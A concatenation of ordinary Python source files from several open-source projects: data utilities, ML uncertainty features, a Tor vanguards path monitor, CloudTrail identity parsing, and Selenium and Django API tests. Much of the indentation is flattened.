    Convert unicode values in a dict to strings
:param s:
:param encoding:
:return:
"""
if isinstance(s, dict):
r = {}
for k in s:
r[byteify(k)] = byteify(s[k])
return r
elif isinstance(s, list):
return [byteify(element) for element in s]
elif type(s).__name__ == 'unicode':
return s.encode(encoding)
else:
return s
def datetime_diff(end, start):
return round((end - start).total_seconds(), 2) # in seconds
def _divide(n1, n2):
r1 = int(n1 / n2)
r2 = n1 % n2
return r1, r2
def human_format_by_minute(seconds):
unit_day = 3600 * 24
unit_hour = 3600
unit_minute = 60
if seconds >= unit_day: # by hour
n_days, remain_seconds = _divide(seconds, unit_day)
n_hours, remain_seconds = _divide(remain_seconds, unit_hour)
n_minutes, remain_seconds = _divide(remain_seconds, unit_minute)
return f"{n_days}d {n_hours}h {n_minutes}m"
if seconds >= unit_hour: # by hour
n_hour, remain_seconds = _divide(seconds, unit_hour)
n_minutes, remain_seconds = _divide(remain_seconds, unit_minute)
return f"{n_hour}h {n_minutes}m"
elif seconds >= unit_minute:
n_minutes, remain_seconds = _divide(seconds, unit_minute)
return f"{n_minutes}m"
else:
return "<1m"
def datetime_diff_human_format_by_minute(end, start):
seconds = round((end - start).total_seconds(), 2) # in seconds
return human_format_by_minute(seconds)
def time_diff(end, start):
delta = end - start
return round(delta, 2) # in seconds
def tail(file_path, n=100):
""" Tail file.
    Read file from tail using seek. Read 1024 chars every time and look for '\n'.
Args:
file_path: a text file only
        n: number of lines to read from the end of the file.
Returns:
Known Issues:
        1. n=1 may see nothing, please check whether the file ends with a '\n'
"""
with open(file_path, 'r') as f:
file_size = f.seek(0, 2) # seek tail
current_position = file_size
line_count = 0
first_line_position = 0
while current_position > 0:
if current_position < MAX_BUFFER_SIZE:
f.seek(0)
buffer_size = current_position
current_position = 0
else:
current_position = current_position - MAX_BUFFER_SIZE
f.seek(current_position)
buffer_size = MAX_BUFFER_SIZE
data = f.read(buffer_size)
data_len = len(data)
for i in range(data_len):
p = data_len - i - 1
                if data[p] == '\n':
line_count = line_count + 1
if line_count == n:
first_line_position = current_position + p + 1 # does not include break
f.seek(first_line_position)
while True:
_d = f.readline()
if _d is not None and len(_d) > 0:
yield _d
else:
break
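# Usage sketch for tail() (illustrative, hypothetical log path): it is a
# generator over roughly the last `n` lines, so it is consumed by iteration.
def _example_tail_usage(log_path="/tmp/train.log"):
    for line in tail(log_path, n=20):
        print(line, end="")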
def readall(p):
with open(p, 'r') as f:
return f.read()
def read_text(p):
with open(p, 'r' , encoding='utf-8') as f:
return f.read()
def load(p):
return loads(readall(p))
def make_dataset_name(name):
"""Dataset name contains "letters, numbers, -, _" only, any other content will be replaced with "-"
"""
def may_replace(c):
if re.match("\w", c) is None:
if c == '-':
return c
else:
return "_"
else:
return c
return "".join([may_replace(c) for c in name])
def require_type(name, o, t):
if o is not None:
if not isinstance(o, t):
raise Exception("'%s'需要%s类型。" % (name, t.__name__))
def require_attr_not_none(o, name):
"""校验对象中的属性不能为空。
Args:
o:
name: 属性的名称。
Returns:
"""
if o is not None:
if getattr(o, name, None) is None:
raise Exception("对象=%s的属性'%s'不能为空。" % (str(o), name))
def require_list_non_empty(name, o):
"""校验数组不能为空。
Args:
name: 提示对象名称。
o: 数组对象。
Returns:
"""
if is_non_empty_list(o):
pass
else:
raise Exception("'%s' 不能为空。" % name)
def require_str_non_empty(str_obj, tips):
"""校验数组不能为空。
Args:
str_obj: 字符串对象。
tips: 为空时的提示信息。
Returns:
"""
if str_obj is None or len(str_obj) == 0:
raise Exception("'%s' 不能为空。" % tips)
def cast_type(o, _type):
if o is None:
return o
else:
if _type == int:
if not isinstance(o, int):
return int(o) # may raise error
else:
return o
if _type == float:
if not isinstance(o, float):
return float(o) # may raise error
else:
return o
elif _type == str:
return str(o)
else:
raise ValueError(f"Not supported convert type: {_type}")
def require_in_dict(_dict, key, _type=int, default=None):
v = _dict.get(key, default)
if v is None:
raise ValueError(f"Key={key} can not be None.")
else:
if isinstance(v, _type):
return v
else:
return cast_type(v, _type)
def get_from_dict(_dict, key, _type=int, default=None):
v = _dict.get(key, default)
if v is None:
return v
else:
if isinstance(v, _type):
return v
else:
return cast_type(v, _type)
def is_non_empty_list(o):
return o is not None and len(o) > 0
def is_empty_list(o):
return o is None or len(o) == 0
def is_non_empty_str(o):
return o is not None and isinstance(o, str) and len(o) > 0
def revert_to_dict_from_dict(d, key):
v = d.get(key)
if v is not None and len(v) > 0 and isinstance(v, str):
d[key] = loads(v)
def revert_to_dict_from_object(obj, *keys):
for key in keys:
v = getattr(obj, key)
if v is not None and len(v) > 0 and isinstance(v, str):
setattr(obj, key, loads(v))
def sqlalchemy_obj_to_dict(entity_instance):
return {attr.key: getattr(entity_instance, attr.key) for attr in entity_instance._sa_instance_state.attrs}
# s = datetime_diff_human_format_by_minute(get_now_datetime(), datetime.datetime(2019,9,29,10,10,10,10) )
# print(s)
def temporary_dataset_dir(dataset_name):
return P.join(consts.PATH_TEMPORARY_DATASET, dataset_name)
def dataset_dir(dataset_name):
return P.join(consts.PATH_DATASET, dataset_name)
def model_name(dataset_name, no_experiment):
return str("%s_%s" % (dataset_name, no_experiment))
def model_dir(dataset_name, model_name):
return P.join(dataset_dir(dataset_name), consts.FIELD_EXPERIMENT, model_name)
def read_csv(csv_file, has_header, default_headers=None):
import pandas as pd # took a lot of time(0.4s)
if has_header:
return pd.read_csv(csv_file) # read it all
else:
if default_headers is None:
raise ValueError("When has_header is False, param default_headers is required.")
df = pd.read_csv(csv_file, header=None)
df.columns = default_headers
return df
def relative_path(p: str, prefix=consts.DATA_DIR):
if p.startswith(prefix):
return p[len(prefix)+1:] # Fix: should not start with '/'
else:
raise ValueError(f"Path is not start with {prefix}.")
import pickle
ENCODING_LIST = ["iso-8859-1", "ascii", 'utf-8', "gbk", "gb2312", "gb18030"]
PICKLE_PROTOCOL = 2
if six.PY2:
PICKLE_PROTOCOL = 2
elif six.PY3:
PICKLE_PROTOCOL = 3
def serialize_with_ignore_variables(obj, variables):
"""
    Serialize an object while ignoring some of its attributes.
:param obj:
:param variables:
:return:
"""
if variables is None:
variables = []
cache_map = {}
    # 1. Temporarily clear the ignored attributes
for v_name in variables:
if hasattr(obj, v_name):
value = getattr(obj, v_name)
cache_map[v_name] = value
setattr(obj, v_name, None)
    # 2. Dump the data
bytes_value = pickle.dumps(obj, protocol=PICKLE_PROTOCOL)
    # 3. Restore the attributes
for k in cache_map:
setattr(obj, k, cache_map[k])
return bytes_value
def deserialize(data):
if six.PY2:
return pickle.loads(data)
else:
_e = None
for encoding in ENCODING_LIST:
try:
obj = pickle.loads(data, encoding=encoding)
return obj
except Exception as e:
_e = e
print("使用编码%s加载对象失败, 原因 %s。" % (encoding, str(e)))
raise _e
def load_pkl(file_path):
with open(file_path, 'rb') as f:
data = f.read()
return deserialize(data)
def serialize2bytes(obj):
return serialize_with_ignore_variables(obj, None)
def serialize2file(obj, path):
data = serialize_with_ignore_variables(obj, None)
with open(path, 'wb') as f:
f.write(data)
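# Round-trip sketch (illustrative, hypothetical path): write an object with
# serialize2file() and read it back with load_pkl().
def _example_pickle_round_trip(path="/tmp/obj.pkl"):
    serialize2file({"a": 1}, path)
    return load_pkl(path)  # -> {"a": 1}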
def script_path(script):
return f"{consts.PATH_INSTALL_HOME}/cooka/core/{script}"
def abs_path(p):
return P.join(consts.DATA_DIR, p)
def validate_sample_conf(sample_conf):
from cooka.common.model import SampleConf # fix import error
if sample_conf.sample_strategy == SampleConf.Strategy.Percentage:
if sample_conf.percentage <= 0 or sample_conf.percentage > 100:
raise ValueError(f"Param sample_conf.percentage should in (0, 100] but is {sample_conf.percentage}")
elif sample_conf.sample_strategy == SampleConf.Strategy.RandomRows:
if sample_conf.n_rows <= 0:
raise ValueError(f"Param sample_conf.n_rows should bigger than 0 but is {sample_conf.n_rows}")
elif sample_conf.sample_strategy == SampleConf.Strategy.WholeData:
pass
else:
raise ValueError(f"Unknown sample strategy: {sample_conf.sample_strategy}")
|
plugins/dbnd-docker/setup.py | busunkim96/dbnd | 224 | 12716169 | from os import path
import setuptools
from setuptools.config import read_configuration
BASE_PATH = path.dirname(__file__)
CFG_PATH = path.join(BASE_PATH, "setup.cfg")
config = read_configuration(CFG_PATH)
version = config["metadata"]["version"]
setuptools.setup(
name="dbnd-docker",
package_dir={"": "src"},
install_requires=[
"dbnd==" + version,
"dbnd-airflow==" + version,
"docker>=3.0",
# k8s
"kubernetes>=9.0.0",
"cryptography>=2.0.0",
],
entry_points={"dbnd": ["dbnd-docker = dbnd_docker._plugin"]},
)
|
uq360/utils/batch_features/batch_basic_pointwise_hist.py | Sclare87/UQ360 | 148 | 12716216 |
import numpy as np
from uq360.utils.batch_features.histogram_feature import SingleHistogramFeature
from uq360.utils.transformers.confidence_delta import ConfidenceDeltaTransformer
from uq360.utils.transformers.confidence_top import ConfidenceTopTransformer
from uq360.utils.transformers.confidence_entropy import ConfidenceEntropyTransformer
from uq360.utils.transformers.class_frequency import ClassFrequencyTransformer
class BasicPointwiseHistogramDistance(SingleHistogramFeature):
def __init__(self, bins=10):
super().__init__(bins)
self.fit_status = True
def set_pointwise_transformer(self, pointwise_transformer):
pass
# Top Confidence feature
class BatchConfidenceTop(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('confidence_top', ConfidenceTopTransformer())
@classmethod
def name(cls):
return ('confidence_top_distance')
# Construct a single histogram
def extract_histogram(self, vec):
bins = np.concatenate([np.linspace(0,0.9,num=10), np.linspace(0.91,1.0,num=10)])
self.histogram_edges = bins
hist , _ = np.histogram(vec, bins=bins)
hist = np.divide(hist, float(len(vec)))
return hist
# Confidence Delta feature
class BatchConfidenceDelta(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('confidence_delta', ConfidenceDeltaTransformer())
@classmethod
def name(cls):
return ('confidence_delta_distance')
# Confidence Entropy feature
class BatchConfidenceEntropy(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('confidence_entropy', ConfidenceEntropyTransformer())
self.changed_histogram = None
@classmethod
def name(cls):
return ('confidence_entropy_distance')
# Construct a single histogram
def extract_histogram(self, vec):
epsilon = 0.001
bins = np.concatenate([np.linspace(0,0.1,num=11), np.linspace(0.2,3.0,num=29)])
# Safety check in case your histogram misses.
too_high = np.mean([vec >= max(bins)])
too_low = np.mean([vec <= min(bins)])
if too_high > 0.5 or too_low > 0.5:
if self.changed_histogram != 'false':
# Don't change prod if test wasn't changed
bins = np.linspace(min(vec) - epsilon, max(vec)+epsilon, num=25)
print("Fixing too high, new histogram is ", bins)
else:
self.changed_histogram = 'false'
self.histogram_edges = bins
hist , _ = np.histogram(vec, bins=bins)
hist = np.divide(hist, float(len(vec)))
return hist
# Predicted class frequency ratio
class BatchClassFrequency(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('class_frequency', ClassFrequencyTransformer())
self.fit_status = False
@classmethod
def name(cls):
return ('class_frequency_distance')
def fit(self, x, y):
if self.fit_status:
return
else:
self.pointwise_transformer.fit(x,y)
self.fit_status = True
# Construct a single histogram
def extract_histogram(self, vec):
freq = self.pointwise_transformer.class_frequencies
ordered_freq = sorted(freq)
# Left edge, edges between each pair of frequencies, and right edge
bins = [ordered_freq[0] - 1]
lf = len(freq)-1
for i in range(lf):
bins.append(0.5*(ordered_freq[i]+ordered_freq[i+1]))
bins.append(ordered_freq[-1] + 1)
self.histogram_edges = bins
hist , _ = np.histogram(vec, bins=bins, density=False)
hist = np.divide(hist, float(len(vec)))
return hist
|
tests/common/test_meter.py | dk25021999/mmf | 3,252 | 12716243 | # Copyright (c) Facebook, Inc. and its affiliates.
import unittest
import torch
from mmf.common.meter import Meter
from mmf.common.report import Report
from mmf.common.sample import SampleList
class TestMeter(unittest.TestCase):
def test_meter_update_from_report(self):
meter = Meter()
prepared_batch = SampleList(
{"targets": torch.tensor([1, 2, 3, 4]), "dataset_type": "val"}
)
for idx in range(5):
model_output = {
"scores": torch.tensor([0, 1, 2, 3]),
"losses": {"loss": float(idx)},
}
report = Report(prepared_batch, model_output)
meter.update_from_report(report)
self.assertEqual(meter.loss.global_avg, 2.0)
self.assertEqual(meter.loss.avg, 2.0)
|
notifications/tests/sample_notifications/apps.py | pandafy/django-notifications | 1,354 | 12716259 | from notifications.apps import Config as NotificationConfig
class SampleNotificationsConfig(NotificationConfig):
name = 'notifications.tests.sample_notifications'
label = 'sample_notifications'
|
timemachines/skaters/rvr/rvrinclusion.py | iklasky/timemachines | 253 | 12716274 | <filename>timemachines/skaters/rvr/rvrinclusion.py
try:
import river
using_river = True
except ImportError:
using_river = False |
bonobo/util/collections.py | Playfloor/bonobo | 1,573 | 12716291 | <filename>bonobo/util/collections.py
import bisect
import functools
from collections.abc import Sequence
class sortedlist(list):
"""
    A list with an insort() method that can be used to maintain sorted lists. The list by itself is not sorted, it's
up to the user to not insert unsorted elements.
"""
def insort(self, x):
"""
If the list is sorted, insert the element in the right place. Otherwise, unpredictable behaviour.
:param x:
"""
bisect.insort(self, x)
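# Usage sketch (illustrative values): a sortedlist stays sorted as long as all
# insertions go through insort() and the initial content is already sorted.
def _example_sortedlist():
    values = sortedlist([1, 3])
    values.insort(2)
    return values  # [1, 2, 3]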
def _with_length_check(f):
@functools.wraps(f)
def _wrapped(*args, length=None, **kwargs):
nonlocal f
result = f(*args, **kwargs)
if length is not None:
if length != len(result):
raise TypeError(
"Length check failed, expected {} fields but got {}: {!r}.".format(length, len(result), result)
)
return result
return _wrapped
def tuple_or_const(tuple_or_mixed, *, consts=(None, False), **kwargs):
"""
Like ensure_tuple, but also accept as valid outputs a list of constants.
"""
if tuple_or_mixed in consts:
return tuple_or_mixed
if isinstance(tuple_or_mixed, str):
pass
elif isinstance(tuple_or_mixed, Sequence):
tuple_or_mixed = tuple(tuple_or_mixed)
return ensure_tuple(tuple_or_mixed, **kwargs)
@_with_length_check
def ensure_tuple(tuple_or_mixed, *, cls=None):
"""
If it's not a tuple, let's make a tuple of one item.
Otherwise, not changed.
:param tuple_or_mixed: material to work on.
:param cls: type of the resulting tuple, or `tuple` if not provided.
:param length: provided by `_with_length_check` decorator, if specified, make sure that the tuple is of this
length (and raise a `TypeError` if not), otherwise, do nothing.
:return: tuple (or something of type `cls`, if provided)
"""
if cls is None:
cls = tuple
if isinstance(tuple_or_mixed, cls):
return tuple_or_mixed
if tuple_or_mixed is None:
return tuple.__new__(cls, ())
if isinstance(tuple_or_mixed, tuple):
return tuple.__new__(cls, tuple_or_mixed)
return tuple.__new__(cls, (tuple_or_mixed,))
def cast(type_):
def _wrap_cast(f):
@functools.wraps(f)
def _wrapped_cast(*args, **kwargs):
nonlocal f, type_
return type_(f(*args, **kwargs))
return _wrapped_cast
return _wrap_cast
tuplize = cast(tuple)
tuplize.__doc__ = """
Decorates a generator and make it a tuple-returning function. As a side effect, it can also decorate any
iterator-returning function to force return value to be a tuple.
>>> tuplized_lambda = tuplize(lambda: [1, 2, 3])
>>> tuplized_lambda()
(1, 2, 3)
>>> @tuplize
... def my_generator():
... yield 1
... yield 2
... yield 3
...
>>> my_generator()
(1, 2, 3)
"""
def coalesce(*values):
"""
Returns the first argument which is not None, or None if all arguments are None.
"""
if not len(values):
raise ValueError("Cannot coalesce an empty list of arguments.")
for value in values:
if value is not None:
return value
return None
|
src/vanguards/pathverify.py | mikeperry-tor/vanguards | 132 | 12716294 | """ Simple checks against bandwidth side channels """
import stem
from . import control
from .logger import plog
_ROUTELEN_FOR_PURPOSE = {
"HS_VANGUARDS" : 4,
"HS_CLIENT_HSDIR" : 5,
"HS_CLIENT_INTRO" : 5,
"HS_CLIENT_REND" : 4,
"HS_SERVICE_HSDIR" : 4,
"HS_SERVICE_INTRO" : 4,
"HS_SERVICE_REND" : 5
}
# XXX: Hrmm
_ROUTELEN_FOR_PURPOSE_LITE = {
"HS_VANGUARDS" : 3,
"HS_CLIENT_HSDIR" : 4,
"HS_CLIENT_INTRO" : 4,
"HS_CLIENT_REND" : 3,
"HS_SERVICE_HSDIR" : 4,
"HS_SERVICE_INTRO" : 4,
"HS_SERVICE_REND" : 4
}
class Layer1Stats:
def __init__(self):
self.use_count = 0
self.conn_count = 1
class Layer1Guards:
def __init__(self, num_layer1):
self.guards = {}
self.num_layer1 = num_layer1
def add_conn(self, guard_fp):
if guard_fp in self.guards:
self.guards[guard_fp].conn_count += 1
else:
self.guards[guard_fp] = Layer1Stats()
def del_conn(self, guard_fp):
if guard_fp in self.guards:
if self.guards[guard_fp].conn_count > 1:
self.guards[guard_fp].conn_count -= 1
else:
del self.guards[guard_fp]
# Returns -1 when fewer than expected, 0 when correct, +1 when too many
# (Retval used only by tests)
def check_conn_counts(self):
ret = 0
if len(self.guards) < self.num_layer1:
plog("NOTICE", "Fewer guard connections than configured. Connected to: "+ \
str(self.guards.keys()))
ret = -1
elif len(self.guards) > self.num_layer1:
plog("NOTICE", "More guard connections than configured. Connected to: "+ \
str(self.guards.keys()))
ret = 1
for g in self.guards.keys():
if self.guards[g].conn_count > 1:
plog("NOTICE", "Extra connections to guard "+g+": "+\
str(self.guards[g].conn_count))
ret = 1
return ret
def add_use_count(self, guard_fp):
if not guard_fp in self.guards:
plog("WARN", "Guard "+guard_fp+" not in "+ \
str(self.guards.keys()))
else:
self.guards[guard_fp].use_count += 1
# Returns -1 when fewer than expected, 0 when correct, +1 when too many
# (Retval used only by tests)
def check_use_counts(self):
ret = 0
layer1_in_use = list(filter(lambda x: self.guards[x].use_count,
self.guards.keys()))
layer1_counts = list(map(lambda x:
x+": "+str(self.guards[x].use_count),
layer1_in_use))
if len(layer1_in_use) > self.num_layer1:
plog("WARN", "Circuits are being used on more guards " + \
"than configured. Current guard use: "+str(layer1_counts))
ret = 1
elif len(layer1_in_use) < self.num_layer1:
plog("NOTICE", "Circuits are being used on fewer guards " + \
"than configured. Current guard use: "+str(layer1_counts))
ret = -1
return ret
class PathVerify:
def __init__(self, controller, full_vanguards, num_layer1, num_layer2, num_layer3):
self.controller = controller
self.full_vanguards = full_vanguards
self.layer2 = set()
self.layer3 = set()
self.num_layer1 = num_layer1
self.num_layer2 = num_layer2
self.num_layer3 = num_layer3
self._layers_init(controller)
self.layer1 = Layer1Guards(self.num_layer1)
self._orconn_init(controller)
def _orconn_init(self, controller):
for l in controller.get_info("orconn-status").split("\n"):
if len(l):
guard_fp = l.split("~")[0][1:]
self.layer1.add_conn(guard_fp)
self.layer1.check_conn_counts()
def _layers_init(self, controller):
layer2 = controller.get_conf("HSLayer2Nodes", None)
layer3 = controller.get_conf("HSLayer3Nodes", None)
# These may be empty at startup
if layer2:
self.layer2 = set(layer2.split(","))
self.full_vanguards = True
if layer3:
self.layer3 = set(layer3.split(","))
self.full_vanguards = True
# If they are empty, and vanguards is disabled by the addon,
# then we're just verifying vg-lite in C-Tor.
if not layer2 and not layer3 and not self.full_vanguards:
plog("NOTICE", "Monitoring vanguards-lite with pathverify.")
# Update our num layer params because they now depend on vg-lite
self.num_layer1 = 1
self.num_layer2 = 4
self.num_layer3 = 0
else:
plog("NOTICE", "Monitoring vanguards with pathverify.")
self._check_layer_counts()
def conf_changed_event(self, event):
if "HSLayer2Nodes" in event.changed:
self.layer2 = set(event.changed["HSLayer2Nodes"][0].split(","))
self.full_vanguards = True
if "HSLayer3Nodes" in event.changed:
self.layer3 = set(event.changed["HSLayer3Nodes"][0].split(","))
self.full_vanguards = True
self._check_layer_counts()
plog("DEBUG", event.raw_content())
# Returns True when right number, False otherwise
def _check_layer_counts(self):
ret = False
# These can become empty briefly on sighup and startup. Aka set([''])
if len(self.layer2) > 1:
if len(self.layer2) != self.num_layer2:
plog("NOTICE", "Wrong number of layer2 guards. " + \
str(self.num_layer2)+" vs: "+str(self.layer2))
ret = False
else:
ret = True
if len(self.layer3) > 1:
if len(self.layer3) != self.num_layer3:
plog("NOTICE", "Wrong number of layer3 guards. " + \
str(self.num_layer3)+" vs: "+str(self.layer3))
ret = False
else:
ret = True
return ret
def orconn_event(self, event):
if event.status == "CONNECTED":
self.layer1.add_conn(event.endpoint_fingerprint)
elif event.status == "CLOSED" or event.status == "FAILED":
self.layer1.del_conn(event.endpoint_fingerprint)
self.layer1.check_conn_counts()
def guard_event(self, event):
if event.status == "GOOD_L2":
self.layer2.add(event.endpoint_fingerprint)
elif event.status == "BAD_L2":
self.layer2.discard(event.endpoint_fingerprint)
plog("DEBUG", event.raw_content())
def routelen_for_purpose(self, purpose):
if self.full_vanguards:
return _ROUTELEN_FOR_PURPOSE[purpose]
else:
return _ROUTELEN_FOR_PURPOSE_LITE[purpose]
def circ_event(self, event):
if event.purpose[0:3] == "HS_" and (event.status == stem.CircStatus.BUILT or \
event.status == "GUARD_WAIT"):
if len(event.path) != self.routelen_for_purpose(event.purpose):
if (event.purpose == "HS_SERVICE_HSDIR" and \
event.hs_state == "HSSI_CONNECTING") or \
(event.purpose == "HS_CLIENT_INTRO" and \
event.hs_state == "HSCI_CONNECTING"):
# This can happen when HS_VANGUARDS are cannibalized..
# XXX: Is that a bug?
# It can also happen if client intros fail and are retried with a
# new hop. That case is not a bug.
plog("INFO", "Tor made a "+str(len(event.path))+ "-hop path, but I wanted a " + \
str(self.routelen_for_purpose(event.purpose))+ "-hop path for purpose " + \
event.purpose +":"+str(event.hs_state)+" + " + \
event.raw_content())
else:
plog("NOTICE", "Tor made a "+str(len(event.path))+ "-hop path, but I wanted a " + \
str(self.routelen_for_purpose(event.purpose))+ "-hop path for purpose " + \
event.purpose +":"+str(event.hs_state)+" + " + \
event.raw_content())
self.layer1.add_use_count(event.path[0][0])
self.layer1.check_use_counts()
if not event.path[1][0] in self.layer2:
plog("WARN", "Layer2 "+event.path[1][0]+" not in "+ \
str(self.layer2))
if self.num_layer3 and not event.path[2][0] in self.layer3:
plog("WARN", "Layer3 "+event.path[1][0]+" not in "+ \
str(self.layer3))
if len(self.layer2) != self.num_layer2:
plog("WARN", "Circuit built with different number of layer2 nodes " + \
"than configured. Currently using: " + str(self.layer2))
if len(self.layer3) != self.num_layer3:
plog("WARN", "Circuit built with different number of layer3 nodes " + \
"than configured. Currently using: " + str(self.layer3))
def circ_minor_event(self, event):
if event.purpose[0:3] == "HS_" and event.old_purpose[0:3] != "HS_":
plog("WARN", "Purpose switched from non-hs to hs: "+ \
str(event.raw_content()))
elif event.purpose[0:3] != "HS_" and event.old_purpose[0:3] == "HS_":
if event.purpose != "CIRCUIT_PADDING" and \
event.purpose != "MEASURE_TIMEOUT" and \
event.purpose != "PATH_BIAS_TESTING":
plog("WARN", "Purpose switched from hs to non-hs: "+ \
str(event.raw_content()))
if event.purpose[0:3] == "HS_" or event.old_purpose[0:3] == "HS_":
if not event.path[0][0] in self.layer1.guards:
plog("WARN", "Guard "+event.path[0][0]+" not in "+ \
str(self.layer1.guards.keys()))
if len(event.path) > 1 and not event.path[1][0] in self.layer2:
plog("WARN", "Layer2 "+event.path[1][0]+" not in "+ \
str(self.layer2))
if self.num_layer3 and len(event.path) > 2 and not event.path[2][0] in self.layer3:
plog("WARN", "Layer3 "+event.path[1][0]+" not in "+ \
str(self.layer3))
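# Hypothetical wiring sketch (names are placeholders: the class defined above and its
# constructor signature are only partially visible here, and the real pathverify module
# performs this registration itself via stem's controller event API):
#   layers = TheClassAbove(controller, num_layer1, num_layer2, num_layer3)
#   for name, handler in [("CIRC", layers.circ_event),
#                         ("CIRC_MINOR", layers.circ_minor_event),
#                         ("ORCONN", layers.orconn_event),
#                         ("GUARD", layers.guard_event),
#                         ("CONF_CHANGED", layers.conf_changed_event)]:
#       controller.add_event_listener(handler, name)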
|
structures/UserIdentity.py | houey/SkyWrapper | 106 | 12716301 | from parsers import UserIdentityParser
# User identity properties
USER_IDENTITY_TYPE = "type"
USER_IDENTITY_PRINCIPAL_ID = "principalid"
USER_IDENTITY_ARN = "arn"
USER_IDENTITY_ACCOUNT_ID = "accountid"
USER_IDENTITY_INVOKED_BY = "invokedby"
USER_IDENTITY_ACCESS_KEY_ID = "accesskeyid"
USER_IDENTITY_USERNAME = "username"
USER_IDENTITY_SESSION_CONTEXT = "sessioncontext"
class UserIdentity(object):
def __init__(self, user_identity_data):
self.user_identity_data = user_identity_data
self.type = None
self.principal_id = None
self.arn = None
self.account_id = None
self.invoked_by = None
self.access_key_id = None
self.username = None
self.session_context = None
self.object = None
self.__parse()
def __parse(self):
self.object = UserIdentityParser.parse_user_identity_filed(self.user_identity_data)
self.type = self.object[USER_IDENTITY_TYPE]
self.principal_id = self.object[USER_IDENTITY_PRINCIPAL_ID]
self.arn = self.object[USER_IDENTITY_ARN]
self.account_id = self.object[USER_IDENTITY_ACCOUNT_ID]
self.invoked_by = self.object[USER_IDENTITY_INVOKED_BY]
self.access_key_id = self.object[USER_IDENTITY_ACCESS_KEY_ID]
self.username = self.object[USER_IDENTITY_USERNAME]
self.session_context = self.object[USER_IDENTITY_SESSION_CONTEXT]
def __repr__(self):
return str(self.__dict__) |
lib/galaxy_test/selenium/test_history_panel_pagination.py | quacksawbones/galaxy-1 | 1,085 | 12716302 | import pytest
from galaxy_test.base.populators import flakey
from .framework import (
selenium_test,
SeleniumTestCase
)
class HistoryPanelPaginationTestCase(SeleniumTestCase):
ensure_registered = True
@selenium_test
@flakey # The next button doesn't always work - maybe a delay in JS callback registering for that.
def test_pagination(self):
if self.is_beta_history():
raise pytest.skip("There is no pagination on the beta history panel")
history_id = self.current_history_id()
self.dataset_populator.new_dataset(history_id, content='1\t2\t3', name="data1")
self.dataset_populator.new_dataset(history_id, content='2\t3\t4', name="data2")
self.dataset_populator.new_dataset(history_id, content='3\t4\t5', name="data3")
self.dataset_populator.new_dataset(history_id, content='4\t5\t6', name="data4")
self.dataset_populator.new_dataset(history_id, content='5\t6\t7', name="data5")
self.home()
for hid in [1, 2, 3, 4, 5]:
self.history_panel_wait_for_hid_state(hid, "ok")
with self.local_storage("historyContentsLimitPerPageDefault", 3):
self.home()
self.history_panel_wait_for_hid_state(5, "ok")
self.screenshot("history_panel_pagination_initial")
pagination_option_text = self.components.history_panel.pagination_pages_selected_option.wait_for_text()
assert "1st of 2 pages" in pagination_option_text
self.components.history_panel.pagination_pages.wait_for_and_click()
self.screenshot("history_panel_pagination_pages_drop_down")
self.components.history_panel.pagination_next.wait_for_and_click()
self.sleep_for(self.wait_types.UX_TRANSITION)
self.screenshot("history_panel_pagination_second")
pagination_option_text = self.components.history_panel.pagination_pages_selected_option.wait_for_text()
assert "2nd of 2 pages" in pagination_option_text
self.components.history_panel.pagination_previous.wait_for_and_click()
self.sleep_for(self.wait_types.UX_TRANSITION)
pagination_option_text = self.components.history_panel.pagination_pages_selected_option.wait_for_text()
assert "1st of 2 pages" in pagination_option_text
|
dfirtrack_api/tests/dfirtrack_artifacts/artifactstatus/test_artifactstatus_api_views.py | thomas-kropeit/dfirtrack | 273 | 12716306 | import urllib.parse
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_artifacts.models import Artifactstatus
class ArtifactstatusAPIViewTestCase(TestCase):
"""artifactstatus API view tests"""
@classmethod
def setUpTestData(cls):
# create object
Artifactstatus.objects.create(artifactstatus_name='artifactstatus_api_1')
# create user
User.objects.create_user(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
def test_artifactstatus_list_api_unauthorized(self):
"""unauthorized access is forbidden"""
# get response
response = self.client.get('/api/artifactstatus/')
# compare
self.assertEqual(response.status_code, 401)
def test_artifactstatus_list_api_method_get(self):
"""GET is allowed"""
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# get response
response = self.client.get('/api/artifactstatus/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifactstatus_list_api_method_post(self):
"""POST is forbidden"""
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create POST string
poststring = {"artifactstatus_name": "artifactstatus_api_2"}
# get response
response = self.client.post('/api/artifactstatus/', data=poststring)
# compare
self.assertEqual(response.status_code, 405)
def test_artifactstatus_list_api_redirect(self):
"""test redirect with appending slash"""
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create url
destination = urllib.parse.quote('/api/artifactstatus/', safe='/')
# get response
response = self.client.get('/api/artifactstatus', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_artifactstatus_detail_api_unauthorized(self):
"""unauthorized access is forbidden"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# get response
response = self.client.get(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/'
)
# compare
self.assertEqual(response.status_code, 401)
def test_artifactstatus_detail_api_method_get(self):
"""GET is allowed"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# get response
response = self.client.get(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/'
)
# compare
self.assertEqual(response.status_code, 200)
def test_artifactstatus_detail_api_method_delete(self):
"""DELETE is forbidden"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# get response
response = self.client.delete(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/'
)
# compare
self.assertEqual(response.status_code, 405)
def test_artifactstatus_detail_api_method_put(self):
"""PUT is forbidden"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create url
